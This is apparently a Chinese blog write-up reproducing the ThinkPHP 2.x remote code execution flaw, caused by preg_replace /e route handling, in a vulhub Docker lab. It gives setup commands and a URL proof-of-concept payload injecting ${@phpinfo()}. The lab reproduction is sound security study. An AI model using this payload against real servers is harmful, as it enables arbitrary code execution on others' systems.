thinkphp2rce漏洞复现

0x01 漏洞描述
描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞

0x02 影响版本
影响Thinkphp 2.x的版本

0x03 漏洞利用

root权限启动docker(我用kali不给root没法搭建环境)

sudo su
systemctl start docker

查看docker进程

ps -ef | grep docker

进入thinkphp目录选择2-rce搭建环境

cd vulhub
cd thinkphp
cd 2-rce
docker-compose up -d

thinkphp2rce漏洞复现_第1张图片

查看docker搭建的ip地址

docker inspect 容器ID

thinkphp2rce漏洞复现_第2张图片

thinkphp2rce漏洞复现_第3张图片 环境搭建成功thinkphp2rce漏洞复现_第4张图片

poc:

?s=/index/index/name/${@phpinfo()}

thinkphp2rce漏洞复现_第5张图片

漏洞复现成功 

你可能感兴趣的:(网络安全,漏洞复现,thinkphp,安全,linux)